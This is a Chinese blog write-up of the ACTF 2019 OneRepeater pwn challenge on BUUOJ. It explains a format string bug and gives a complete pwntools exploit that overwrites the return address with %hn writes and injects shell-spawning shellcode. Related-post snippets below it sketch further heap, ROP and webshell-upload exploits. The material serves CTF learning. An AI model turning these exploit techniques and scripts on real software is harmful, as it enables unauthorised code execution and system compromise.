actf-2019-onerepeater

最新推荐文章于 2024-03-10 00:31:51 发布
最新推荐文章于 2024-03-10 00:31:51 发布
阅读量348 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stella_Leo/article/details/119897548
版权

格式化字符串漏洞 栈溢出 shellcode 返回地址 payload
关键词由CSDN通过智能技术生成

深夜写题

int __cdecl main()
{
  int v1; // [esp+Ch] [ebp-40Ch]
  char buf; // [esp+10h] [ebp-408h]

  sub_804864B();
  while ( 1 )
  {
    while ( 1 )
    {
      puts("What you want to do?\n1) Input someing exciting to repeat!\n2) repeating!!!\n3) Exit");
      __isoc99_scanf("%d", &v1);
      getchar();
      if ( v1 != 2 )
        break;
      Printf(&buf);
    }
    if ( v1 == 3 )
      break;
    if ( v1 == 1 )
      vul(&buf, 0x400u);
    else
      printf("What do you mean by %d", v1);
  }
  puts("You're welcome~");
  return 0;
}

看起来蛮简单的,格式化字符串漏洞,然后vul函数里面还泄露了buf的地址。(这个函数经过我改名字的)

安全全部关闭,

基本思路是,先看格式化字符串是第几个参数,然后覆盖返回地址为buf,并且在buf写入shellcode。

第16个参数是buf,然后buf是ebp+0x408所以ret的参数位置是(0x408+0x4)/4+16也就是275个参数。

payload

payload = (buf+0x40c) + (buf+0x40e) + shellcode + padding + '%16$hn' + '17$hn'

这个还是一样的16,17的位置灵活考虑,然后返回地址不是buf而是buf+0x8的shellcode。

但是发现,太长了,忘记考虑长度了,所以分四次发payload一次改一个字节。

from pwn import * 
context(log_level = 'debug',arch = 'i386',os = 'linux')
#sh = process("./ACTF_2019_OneRepeater")
sh = remote("node3.buuoj.cn","28112")
sh.sendlineafter("3) Exit\n","1")
stack_addr = int((sh.recv()[0:8]),base = 16)
print hex(stack_addr)
sh.sendline("break")
ret_addr = stack_addr + 0x418 + 4
payload = p32(ret_addr) + '%' + str(stack_addr % 65536 - 4) + 'c' + "%16$hn"  
sh.sendlineafter("3) Exit\n","1")
sh.sendline(payload)
sh.sendlineafter("3) Exit\n","2")
payload = p32(ret_addr + 2) + '%' + str(stack_addr // 65536 - 4) + 'c' + "%16$hn" 
sh.sendlineafter("3) Exit\n","1")
sh.sendline(payload)
sh.sendlineafter("3) Exit\n","2")          
sh.sendlineafter("3) Exit\n","1")
sh.sendline(asm(shellcraft.sh()))
sh.sendlineafter("3) Exit\n","3")                                            
sh.interactive()

这个exp也是chuj师傅写的,我直接搬过来了,和师傅相比我还是太菜了。。。格式化字符串可以重复利用的时候就不要太着急,可以分两次改,同时第三次写shellcode也没关系。。。我太着急了,想着一步到位,结果出错了。

还有有个问题遇到很久了,这里终于可以解决了

问题

这里的main函数结束语句好像有点不一样。

它为了输出一段字符串,将esp加了0x10,所以最后ret时的栈地址是泄露的stack_addr + 0x408 + 0x10 + 4,然后我们就可以写出payload了。

这也是看了师傅的WP才知道,之前自己随便写什么函数也遇到了类似的情况,但是不知道怎么解决,只能慢慢的去调试算偏移。这里的话,减去0x10就多了0x10的偏移,我觉得应该是var_4这个东西就是0x10但是也不知道为啥。调试的话,确实差了0x10。先记住吧以后覆盖main函数返回地址留个心眼。

16385
关注
buuctf actf_2019_babystack
weixin_45441024的博客
12-07 542
buuctf actf_2019_babystack from pwn import * from LibcSearcher import LibcSearcher r = remote("node3.buuoj.cn",27848) elf = ELF("/home/pwn/Desktop/ACTF_2019_babystack") nbytes_length = 0xE0 offset = 0xD0 leave_retn = 0x00400A4E puts_got = elf.got["puts"]
[GUET-CTF2019]re-[SUCTF2019]SignIn-相册-[ACTF新生赛2020]usualCrypt
AlienEowynWan的博客
06-03 395
BUUCTF[GUET-CTF2019]re[SUCTF2019]SignIn相册[ACTF新生赛2020]usualCrypt [GUET-CTF2019]re UPX壳,Kali脱壳 elf文件,IDA64打开 通过字符串找到这里 看if判断里面的函数sub_4009AE() _BOOL8 __fastcall sub_4009AE(char *a1) { if ( 1629056 * *a1 != 166163712 ) return 0LL; if ( 6771600 * a
actf_2019_onerepeater
z1r0的博客
04-09 423
actf_2019_onerepeater 查看保护 简单题 功能二一个格式化漏洞,这个format是由功能1传的,先利用功能1+2配合起来泄露出Libc。 再利用这两个功能配合起来改printf_got为system,传入/bin/sh from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m
BUUCTF pwn actf_2019_anotherrepeater
stareforever的博客
01-18 1730
查看程序保护 保护基本都没开 查看程序流程 main函数,然后进入到input函数 input函数 先输入buf的大小,这里有整数溢出,可以控制buf的大小 输入-10,可以发现buf的大小是65526,并且打印出buf的地址 那么read(0,&buf,v6)就会发生栈溢出,所以可以考虑在buf里写入shellcode,然后再控制程序流返回到buf处即可, 栈溢出大小是0x41b 完整ex from pwn import * context(log_level='debug') #io
pwn—actf_2019_message(转载)
INK
08-26 206
pwn
actf_2019_babyheap
z1r0的博客
02-16 685
actf_2019_babyheap 查看保护 这里有一个uaf。 这里的堆块还创建一个指向show的地址。 攻击思路: 因为有show的地址,还有uaf。所以可以通过uaf来修改show的地址为system_plt。创建两个0x31大小的堆,此时释放掉再申请两个0x21大小的堆,这个时候就是调用其余一个存放功能的堆块,再加上uaf的存在,将show功能的堆块改为system,将存放conext的功能改到binsh那里,此时调用另一个堆块就相当于调用system("/bin/sh"); from pw
buuoj Pwn writeup 176-180
yongbaoii的博客
06-09 305
176 jarvisoj_itemboard 177 asis2016_b00ks 178 actf_2019_onerepeater 179 ciscn_2019_s_8 180 starctf_2019_girlfriend
buuctf刷题-cyptro-[ACTF新生赛2020]crypto-classic1
菜鸟之路
08-24 2676
键盘密码-维吉尼亚-[ACTF新生赛2020]crypto-classic1 首先有个hint.txt和一个压缩包: 哇,这里有压缩包的密码哦,于是我低下了头,看向了我的双手,试图从中找到某些规律 xdfv ujko98 edft54 xdfv pok,.; wsdr43 低头看看键盘,键盘密码,xdfv连起来,包出的字母是啥 于是解密得到circle 解压,得到vigenere.zip SRLU{LZPL_S_UASHKXUPD_NXYTFTJT} 猜测SRLU对应FLAG,对应秘钥为nump,结果试
BUUCTF-Web-[ACTF2020新生赛]Upload
m0_61851859的博客
03-27 438
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
[ACTF新生赛2020]crypto-des
weixin_44110537的博客
07-22 1251
题目 分析 打开提示 提示说要了解一些c语言的数据类型. 打开encryptedkey.txt 一看数据范围就知道该类型是double类型 可是有什么用呢 难道提示压缩包的密码是double吗?,是不是太简单了,毕竟直接爆破就可以得到. 不管先爆破再说. 于是理所当然,爆破失败. 于是想这数据究竟能给出什么信息呢,试着转化为内部存储模式. 再去解码 解得key 打开压缩包是一个加密脚本 import pyDes import base64 from FLAG import flag deskey
ACTF_2019_ACTFNOTE(top chunk上移)
seaaseesa的博客
07-01 853
ACTF_2019_ACTFNOTE 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit里存在溢出,可以直接修改top chunk的size 那么只需要把top chunk的size修改为-1,然后malloc(负数)即可将TOP chunk向前移动与已有的chunk重叠,然后通过申请空间,控制该程序结构体的指针即可实现任意地址读写。 #coding:utf8 from pwn import * #sh = process('./ACTF_2019_ACTFNOTE')
noxctf2018_grocery_list&&actf_2019_message
doudoudedi
03-17 524
noxctf2018_grocery_list 先是观察函数发现有一个可以泄露栈地址然后通过tcache attack打到栈上泄露libcbase然后再次写入free_hook拿到shell exp: #!/usr/bin/python2 from pwn import * #p=process('./GroceryList') p=remote('node3.buuoj.cn',26988) e...
BugkuCTF-PWN题pwn7-repeater详细讲解多解法
am_03的博客
08-31 4214
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
buuoj Pwn writeup 236-240
yongbaoii的博客
08-31 445
236 qctf_2018_dice_game 逻辑也是比较的简单。 有个随机数,在栈上,有个栈溢出,答对五十次就可以了。 但是我们可以直接覆盖种子 种子也覆盖成0.这样我们就可以知道第一个数是多少了。 溢出一下就可以了。 exp #-*- coding:utf-8 -*- from pwn import* from ctypes import* context.log_level="debug" r=remote("node4.buuoj.cn","27598") lib = cdll.LoadLi
忘记密码-链接的形式(链接Token参数可逆、结合CTF靶场)
m0_61506558的博客
08-14 816
通过邮箱找回密码时,邮件中将出现一个含有 token 的重置 URL ,该 token 即为重置凭证。从经验来看,开发人员习惯以时间戳、递增序号、关键字段(如邮箱地址)等三类信16/40息之一作为因子,采用某种加密算法或编码生成 token ,攻击者可以基于能收集到的关键字段,用常见加密算法计算一遍,以判断是否可以预测出 token。下面举两个案例加以说明。............
【CTF练习】Ctfshow入门 爆破(21-24)
最新发布
Lush_hair_Dl的博客
03-10 1818
爆破题常用的工具就是bp的Intruder模块,将抓到的包发送到Repeater(点击action会有相应选项),用字典爆破:本题是一个登录窗口,首先第一步就是先输入用户名为:admin(一般没有额外提示就这么猜),密码随便输(此处输入111),然后登录。这一过程的目的是为了抓包查看爆破点有的时候抓包会直接看到用户名和密码的位置,这里就不能直接看到,此处将用户名和密码进行base64加密(对于一串字符后有=,基本就要猜测这一串数据是否是base64加密,解密看看是否有什么信息),解密后发现是。
我的CTF学习与教学之旅笔记14
lm19770429的专栏
04-10 354
命令注入: 查找一切可以浏览的页面,一定要浏览源码,可能发现密码 找到一个网站上的文件backup.zip,解压,密码可以参考刚浏览到的密码 一般解压出来的mp3文件不一定是mp3文件,用file 文件名,查看文件类型,一般是文本文件 cat 这个文件,了解详细内容 根据网站名称,searchsploit 查找相关漏洞说明 利用burpsuite:proxy、 repeater ...
CTF攻防世界web题解题思路XFF-REFERER
m0_63687631的博客
12-25 3088
1.打开网页 2.然抓个包改变下ip 3.用X-Forwarded-For改变ip,如图: 4.因为要重复使用所以要用repeater,然后发送 5. 然后是这样,点击render 6.最后输入referer 7.点render,可得到flag 知识点: 1.ip地址可以用,X-Forwarded-For改 2.referer是就是来源网站。 ...
记一次CTF过程(Writeup)
热门推荐
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
ACTF gogogo
09-06
- *1* *2* *3* [【2022 ACTF-wp】](https://blog.csdn.net/qq_45603443/article/details/125498747)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值